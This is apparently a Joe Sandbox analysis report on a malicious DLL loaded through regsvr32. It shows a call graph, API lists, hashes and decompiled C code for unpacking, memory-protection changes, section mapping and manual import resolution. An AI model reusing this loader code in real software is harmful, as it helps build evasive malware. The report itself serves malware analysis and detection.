15900->15906 15902 67d320df 15902->15345 15907 67d38337 RtlLeaveCriticalSection 15903->15907 15905 67d3212d 15905->15348 15906->15902 15907->15905 15910 67d31e96 __CRT_INIT@12 15908->15910 15909 67d31eaf 15913 67d31ebe 15909->15913 15914 67d33da6 _free 41 API calls 15909->15914 15910->15909 15911 67d31f9e __CRT_INIT@12 15910->15911 15912 67d33da6 _free 41 API calls 15910->15912 15911->15362 15912->15909 15915 67d31ecd 15913->15915 15916 67d33da6 _free 41 API calls 15913->15916 15914->15913 15917 67d31edc 15915->15917 15918 67d33da6 _free 41 API calls 15915->15918 15916->15915 15919 67d31eeb 15917->15919 15920 67d33da6 _free 41 API calls 15917->15920 15918->15917 15921 67d33da6 _free 41 API calls 15919->15921 15922 67d31efa 15919->15922 15920->15919 15921->15922 15923 67d31f09 15922->15923 15924 67d33da6 _free 41 API calls 15922->15924 15925 67d31f1b 15923->15925 15926 67d33da6 _free 41 API calls 15923->15926 15924->15923 15927 67d381ad __lock 41 API calls 15925->15927 15926->15925 15931 67d31f23 15927->15931 15928 67d31f46 15940 67d31faa 15928->15940 15931->15928 15933 67d33da6 _free 41 API calls 15931->15933 15932 67d381ad __lock 41 API calls 15938 67d31f5a ___removelocaleref 15932->15938 15933->15928 15934 67d31f8b 15943 67d31fb6 15934->15943 15937 67d33da6 _free 41 API calls 15937->15911 15938->15934 15939 67d313b2 ___freetlocinfo 41 API calls 15938->15939 15939->15934 15946 67d38337 RtlLeaveCriticalSection 15940->15946 15942 67d31f53 15942->15932 15947 67d38337 RtlLeaveCriticalSection 15943->15947 15945 67d31f98 15945->15937 15946->15942 15947->15945 15950 67d4f23c ___DllMainCRTStartup 15948->15950 15949 67d4fbb4 GetEnvironmentVariableA 15949->15950 15950->15949 15951 67d4ff9e 15950->15951 15954 67da18f0 15951->15954 15955 67da192c strtoxq 15954->15955 15956 67da1a10 GetTempPathA VirtualProtect 15955->15956 15957 67da1adf 15956->15957 15957->15957 15958 67cd1dae 15959 67cd1dc4 15958->15959 15960 67cd1e33 InterlockedDecrement 15958->15960 15961 67cd1dcb InterlockedIncrement 15959->15961 15966 67cd1e1e 15959->15966 15962 67cd1e42 15960->15962 15960->15966 15964 67cd1dde HeapCreate 15961->15964 15961->15966 15963 67cd1e74 HeapDestroy 15962->15963 15965 67cd1e4f SleepEx 15962->15965 15968 67cd1e68 CloseHandle 15962->15968 15963->15966 15964->15966 15967 67cd1df4 15964->15967 15965->15962 15965->15968 15969 67cd13d1 6 API calls 15967->15969 15968->15963 15969->15966 15970 67cd14e8 ConvertStringSecurityDescriptorToSecurityDescriptorA 15971 67cd1697 3 API calls 15970->15971 15972 67cd1543 15971->15972 15973 67cd1598 ExitThread 15972->15973 15974 67cd1547 lstrlenW 15972->15974 15980 67cd1144 GetSystemTimeAsFileTime _aulldiv _snwprintf 15974->15980 15979 67cd156a 15991 67cd1444 15979->15991 15981 67cd119d 15980->15981 15982 67cd11a2 CreateFileMappingW 15980->15982 15981->15982 15983 67cd11bd 15982->15983 15984 67cd1205 GetLastError 15982->15984 15985 67cd11c8 GetLastError 15983->15985 15986 67cd11d6 MapViewOfFile 15983->15986 15987 67cd11e6 15984->15987 15985->15986 15988 67cd11d1 15985->15988 15986->15987 15989 67cd11f4 GetLastError 15986->15989 15987->15979 15990 67cd11fc CloseHandle 15988->15990 15989->15987 15989->15990 15990->15987 16004 67cd1060 15991->16004 15995 67cd148e 15998 67cd14ca 15995->15998 16021 67cd1f7c 15995->16021 16032 67cd142f HeapFree 15998->16032 16002 67cd14dc GetWindowLongW 16002->15973 16003 67cd14c2 GetLastError 16003->15998 16033 67cd1b58 HeapAlloc 16004->16033 16006 67cd106e 16007 67cd1078 GetModuleHandleA GetProcAddress 16006->16007 16016 67cd1124 16006->16016 16008 67cd10af GetProcAddress 16007->16008 16015 67cd111d 16007->16015 16009 67cd10c5 GetProcAddress 16008->16009 16008->16015 16011 67cd10db GetProcAddress 16009->16011 16009->16015 16012 67cd10f1 GetProcAddress 16011->16012 16011->16015 16013 67cd1107 16012->16013 16012->16015 16034 67cd1b9c NtCreateSection 16013->16034 16015->16016 16040 67cd142f HeapFree 16015->16040 16016->16002 16017 67cd1a5a memcpy 16016->16017 16018 67cd1aca 16017->16018 16019 67cd1a93 16017->16019 16018->15995 16019->16018 16020 67cd1aac memcpy 16019->16020 16020->16019 16023 67cd149f 16021->16023 16024 67cd1f9f 16021->16024 16022 67cd1fb0 LoadLibraryA 16022->16023 16022->16024 16023->15998 16027 67cd126d VirtualProtect 16023->16027 16024->16022 16024->16023 16026 67cd2019 16024->16026 16025 67cd2022 GetProcAddress 16025->16026 16026->16024 16026->16025 16028 67cd1345 16027->16028 16029 67cd12b6 16027->16029 16028->15998 16028->16003 16029->16028 16030 67cd130c VirtualProtect 16029->16030 16030->16029 16031 67cd1321 GetLastError 16030->16031 16031->16029 16032->16002 16033->16006 16035 67cd1c00 16034->16035 16038 67cd1c2d 16034->16038 16041 67cd1ec7 NtMapViewOfSection 16035->16041 16038->16015 16039 67cd1c14 memset 16039->16038 16040->16016 16042 67cd1c0e 16041->16042 16042->16038 16042->16039

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Function 67DA7188, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 33 67da7188-67da71d4 35 67da71de-67da71e4 33->35 36 67da71d6-67da71dc 33->36 38 67da71e9-67da71ee 35->38 37 67da71fd-67da7225 36->37 41 67da7269-67da732f VirtualAlloc call 67da6ee6 call 67da6eb6 VirtualAlloc call 67da6e3e VirtualFree 37->41 42 67da7227-67da7229 37->42 39 67da71f0-67da71f5 38->39 40 67da71f7 38->40 39->38 40->37 50 67da734c-67da7358 41->50 51 67da7331-67da734b call 67da6ee6 41->51 42->41 44 67da722b-67da7265 VirtualAlloc 42->44 44->41 53 67da735a-67da735d 50->53 54 67da735f 50->54 51->50 56 67da7362-67da737d call 67da6eb6 53->56 54->56 59 67da737f-67da7392 call 67da6d95 56->59 60 67da7397-67da73c6 56->60 59->60 62 67da73c8-67da73d6 60->62 63 67da73dc-67da73e7 60->63 62->63 64 67da73d8 62->64 65 67da73e9-67da73f2 63->65 66 67da7402-67da741f VirtualProtect 63->66 64->63 65->66 67 67da73f4-67da73fc 65->67 68 67da7421-67da742d 66->68 69 67da7454-67da750b call 67da7018 call 67da6faa call 67da704e VirtualProtect 66->69 67->66 71 67da73fe 67->71 72 67da742f-67da7446 VirtualProtect 68->72 80 67da7511-67da7536 69->80 71->66 74 67da744a-67da7452 72->74 75 67da7448 72->75 74->69 74->72 75->74 81 67da7538-67da753d 80->81 82 67da753f 80->82 83 67da7544-67da754f 81->83 82->83 84 67da7551 83->84 85 67da7554-67da756c VirtualProtect 83->85 84->85 85->80 86 67da756e-67da7595 VirtualFree GetPEB 85->86 87 67da759a-67da75a1 86->87 88 67da75a3 87->88 89 67da75a7-67da75c1 87->89 88->87 90 67da75a5 88->90 91 67da75c4-67da75ed call 67da70be call 67da75f2 89->91 90->91
                                                                                                                                                                  APIs
                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,000006AB,00003000,00000040,000006AB,67DA6BE0), ref: 67DA7245
                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000314,00003000,00000040,67DA6C41), ref: 67DA727C
                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,0000EC31,00003000,00000040), ref: 67DA72DC
                                                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 67DA7312
                                                                                                                                                                  • VirtualProtect.KERNEL32(67CD0000,00000000,00000004,67DA7167), ref: 67DA7417
                                                                                                                                                                  • VirtualProtect.KERNEL32(67CD0000,00001000,00000004,67DA7167), ref: 67DA743E
                                                                                                                                                                  • VirtualProtect.KERNEL32(00000000,?,00000002,67DA7167), ref: 67DA750B
                                                                                                                                                                  • VirtualProtect.KERNEL32(00000000,?,00000002,67DA7167,?), ref: 67DA7561
                                                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 67DA757D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.587551185.0000000067DA6000.00000040.00020000.sdmp, Offset: 67DA6000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67da6000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2574235972-0
                                                                                                                                                                  • Opcode ID: 809c7055cc761c65bd0d80cc4914a0d3f47182814d01b9dbc598a8231fe2a8b3
                                                                                                                                                                  • Instruction ID: 3ff169ea8b7e0bdc79e6c17ae9ea834bc60de64deb3f8f155b863d76817926b2
                                                                                                                                                                  • Opcode Fuzzy Hash: 809c7055cc761c65bd0d80cc4914a0d3f47182814d01b9dbc598a8231fe2a8b3
                                                                                                                                                                  • Instruction Fuzzy Hash: 1CD18176500102EFDB16CF44C8A0B51B7A5FF89310B1B4994ED5AEF3DAD771A80ACB64
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67CD1144, Relevance: 13.6, APIs: 9, Instructions: 81filetimeCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  C-Code - Quality: 69%
                                                                                                                                                                  			E67CD1144(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L67CD2210();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x67cd41d0;
				_push(_t15 + 0x67cd505e);
				_push(_t15 + 0x67cd5054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L67CD220A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x67cd41c0, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}














                                                                                                                                                                  0x67cd1144
                                                                                                                                                                  0x67cd114d
                                                                                                                                                                  0x67cd1151
                                                                                                                                                                  0x67cd1157
                                                                                                                                                                  0x67cd115c
                                                                                                                                                                  0x67cd1161
                                                                                                                                                                  0x67cd1164
                                                                                                                                                                  0x67cd1167
                                                                                                                                                                  0x67cd116c
                                                                                                                                                                  0x67cd116d
                                                                                                                                                                  0x67cd1170
                                                                                                                                                                  0x67cd117b
                                                                                                                                                                  0x67cd1182
                                                                                                                                                                  0x67cd1186
                                                                                                                                                                  0x67cd1188
                                                                                                                                                                  0x67cd1189
                                                                                                                                                                  0x67cd118c
                                                                                                                                                                  0x67cd1191
                                                                                                                                                                  0x67cd119b
                                                                                                                                                                  0x67cd119d
                                                                                                                                                                  0x67cd119d
                                                                                                                                                                  0x67cd11b1
                                                                                                                                                                  0x67cd11b7
                                                                                                                                                                  0x67cd11bb
                                                                                                                                                                  0x67cd120b
                                                                                                                                                                  0x67cd11bd
                                                                                                                                                                  0x67cd11c6
                                                                                                                                                                  0x67cd11dc
                                                                                                                                                                  0x67cd11e4
                                                                                                                                                                  0x67cd11f6
                                                                                                                                                                  0x67cd11fa
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd11e6
                                                                                                                                                                  0x67cd11e9
                                                                                                                                                                  0x67cd11ee
                                                                                                                                                                  0x67cd11f0
                                                                                                                                                                  0x67cd11f0
                                                                                                                                                                  0x67cd11d1
                                                                                                                                                                  0x67cd11d3
                                                                                                                                                                  0x67cd11fc
                                                                                                                                                                  0x67cd11fd
                                                                                                                                                                  0x67cd11fd
                                                                                                                                                                  0x67cd11c6
                                                                                                                                                                  0x67cd1213

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,67CD156A,0000000A,?,?), ref: 67CD1151
                                                                                                                                                                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 67CD1167
                                                                                                                                                                  • _snwprintf.NTDLL ref: 67CD118C
                                                                                                                                                                  • CreateFileMappingW.KERNELBASE(000000FF,67CD41C0,00000004,00000000,?,?), ref: 67CD11B1
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,67CD156A,0000000A,?), ref: 67CD11C8
                                                                                                                                                                  • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 67CD11DC
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,67CD156A,0000000A,?), ref: 67CD11F4
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,67CD156A,0000000A), ref: 67CD11FD
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,67CD156A,0000000A,?), ref: 67CD1205
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1724014008-0
                                                                                                                                                                  • Opcode ID: 05cbb1e3fa604ac3b7cf2d7927c3c8084f48b9021c80cbc2231a50d921d5de10
                                                                                                                                                                  • Instruction ID: 3acab1d038559957b179821649014311177ae86c16968862481eebb2bd9197c5
                                                                                                                                                                  • Opcode Fuzzy Hash: 05cbb1e3fa604ac3b7cf2d7927c3c8084f48b9021c80cbc2231a50d921d5de10
                                                                                                                                                                  • Instruction Fuzzy Hash: CD2168B2640108EFDB11AFACCCC5E9E7BB8EB4A350F124125FB25E6180E635A945CB61
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67D4F1F0, Relevance: 6.3, APIs: 1, Strings: 2, Instructions: 1070COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: T$W
                                                                                                                                                                  • API String ID: 0-2417195663
                                                                                                                                                                  • Opcode ID: 5a18941386d8b5c66ea59cee1fa0ca2b10e5a45d2b8103b9a6c55eeafce31005
                                                                                                                                                                  • Instruction ID: e7357edc0c8b64af0a309202930c321a0dd906dc0e0cee9cb8ec63d459bebf31
                                                                                                                                                                  • Opcode Fuzzy Hash: 5a18941386d8b5c66ea59cee1fa0ca2b10e5a45d2b8103b9a6c55eeafce31005
                                                                                                                                                                  • Instruction Fuzzy Hash: 7C9292B560A351CFDB04CF28C49125EBBE1BB9A324F484E2EE496C7355D3389889CF56
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67CD1B9C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70nativeCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 419 67cd1b9c-67cd1bfe NtCreateSection 420 67cd1c35-67cd1c39 419->420 421 67cd1c00-67cd1c09 call 67cd1ec7 419->421 425 67cd1c3b-67cd1c41 420->425 424 67cd1c0e-67cd1c12 421->424 426 67cd1c2d-67cd1c33 424->426 427 67cd1c14-67cd1c2b memset 424->427 426->425 427->425
                                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                                  			E67CD1B9C(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E67CD1EC7(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                                                                                                                                                                  0x67cd1ba5
                                                                                                                                                                  0x67cd1bac
                                                                                                                                                                  0x67cd1bad
                                                                                                                                                                  0x67cd1bae
                                                                                                                                                                  0x67cd1baf
                                                                                                                                                                  0x67cd1bb0
                                                                                                                                                                  0x67cd1bc1
                                                                                                                                                                  0x67cd1bc5
                                                                                                                                                                  0x67cd1bd9
                                                                                                                                                                  0x67cd1bdc
                                                                                                                                                                  0x67cd1bdf
                                                                                                                                                                  0x67cd1be6
                                                                                                                                                                  0x67cd1be9
                                                                                                                                                                  0x67cd1bf0
                                                                                                                                                                  0x67cd1bf3
                                                                                                                                                                  0x67cd1bf6
                                                                                                                                                                  0x67cd1bf9
                                                                                                                                                                  0x67cd1bfe
                                                                                                                                                                  0x67cd1c39
                                                                                                                                                                  0x67cd1c00
                                                                                                                                                                  0x67cd1c03
                                                                                                                                                                  0x67cd1c09
                                                                                                                                                                  0x67cd1c0e
                                                                                                                                                                  0x67cd1c12
                                                                                                                                                                  0x67cd1c30
                                                                                                                                                                  0x67cd1c14
                                                                                                                                                                  0x67cd1c1b
                                                                                                                                                                  0x67cd1c29
                                                                                                                                                                  0x67cd1c29
                                                                                                                                                                  0x67cd1c12
                                                                                                                                                                  0x67cd1c41

                                                                                                                                                                  APIs
                                                                                                                                                                  • NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 67CD1BF9
                                                                                                                                                                    • Part of subcall function 67CD1EC7: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,67CD1C0E,00000002,00000000,?,?,00000000,?,?,67CD1C0E,00000000), ref: 67CD1EF4
                                                                                                                                                                  • memset.NTDLL ref: 67CD1C1B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Section$CreateViewmemset
                                                                                                                                                                  • String ID: @
                                                                                                                                                                  • API String ID: 2533685722-2766056989
                                                                                                                                                                  • Opcode ID: 4d7eee9f11a7039b7ba48ef3c3db40ff58bda86e38dd00c02ef6a9748d42a3ba
                                                                                                                                                                  • Instruction ID: ad3895cccedc75f641e0c9e968ca69dd1547d121b5fc2f686231ac29d1e876fb
                                                                                                                                                                  • Opcode Fuzzy Hash: 4d7eee9f11a7039b7ba48ef3c3db40ff58bda86e38dd00c02ef6a9748d42a3ba
                                                                                                                                                                  • Instruction Fuzzy Hash: 052108B2D0020DAFDB01DFA9C8849DEFBB9FB48354F118829E615F3210E735AA45CB65
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67CD1E8A, Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                  			E67CD1E8A(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}





                                                                                                                                                                  0x67cd1e8e
                                                                                                                                                                  0x67cd1e9f
                                                                                                                                                                  0x67cd1ea7
                                                                                                                                                                  0x67cd1ea9
                                                                                                                                                                  0x67cd1ebc
                                                                                                                                                                  0x67cd1ebc
                                                                                                                                                                  0x67cd1ec6

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,67CD1B27,?,67CD1CE6,?,00000000,00000000,?,?,?,67CD1CE6), ref: 67CD1E9F
                                                                                                                                                                  • GetSystemDefaultUILanguage.KERNEL32(?,?,67CD1B27,?,67CD1CE6,?,00000000,00000000,?,?,?,67CD1CE6), ref: 67CD1EA9
                                                                                                                                                                  • VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,67CD1B27,?,67CD1CE6,?,00000000,00000000,?,?,?,67CD1CE6), ref: 67CD1EBC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Language$DefaultInfoLocaleNameSystem
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3724080410-0
                                                                                                                                                                  • Opcode ID: 454972b44f719f11e72bdc6d6130d049965d223b917fec2498e52ac123b8ac1a
                                                                                                                                                                  • Instruction ID: 590b0fb39483b490185579609b5f2588b513ed8214d050481ed99ee779a9a4fe
                                                                                                                                                                  • Opcode Fuzzy Hash: 454972b44f719f11e72bdc6d6130d049965d223b917fec2498e52ac123b8ac1a
                                                                                                                                                                  • Instruction Fuzzy Hash: 18E0B874640245F7E700D7A19D46F7972B8970574AF510144F751D61C0E7749E04D769
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67CD1F7C, Relevance: 3.1, APIs: 2, Instructions: 92libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 461 67cd1f7c-67cd1f99 462 67cd207f-67cd2084 461->462 463 67cd1f9f-67cd1fa9 461->463 463->462 464 67cd1faf 463->464 465 67cd1fb0-67cd1fbf LoadLibraryA 464->465 466 67cd2075-67cd207b 465->466 467 67cd1fc5-67cd1fdb 465->467 470 67cd207e 466->470 468 67cd1fdd-67cd1fe1 467->468 469 67cd1fe3-67cd1feb 467->469 468->469 471 67cd2061-67cd206d 468->471 472 67cd2050-67cd2054 469->472 470->462 471->465 475 67cd2073 471->475 473 67cd1fed 472->473 474 67cd2056 472->474 476 67cd1fef-67cd1ff1 473->476 477 67cd1ff3-67cd1ff5 473->477 474->471 475->470 478 67cd2003-67cd2006 476->478 479 67cd2008-67cd200f 477->479 480 67cd1ff7-67cd2001 477->480 481 67cd2012-67cd2017 478->481 479->481 480->478 480->479 482 67cd201e 481->482 483 67cd2019-67cd201c 481->483 484 67cd2022-67cd202e GetProcAddress 482->484 483->484 485 67cd2058-67cd205e 484->485 486 67cd2030-67cd2035 484->486 485->471 487 67cd203f-67cd204d 486->487 488 67cd2037-67cd203d 486->488 487->472 488->487
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E67CD1F7C(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x67cd41cc;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}




























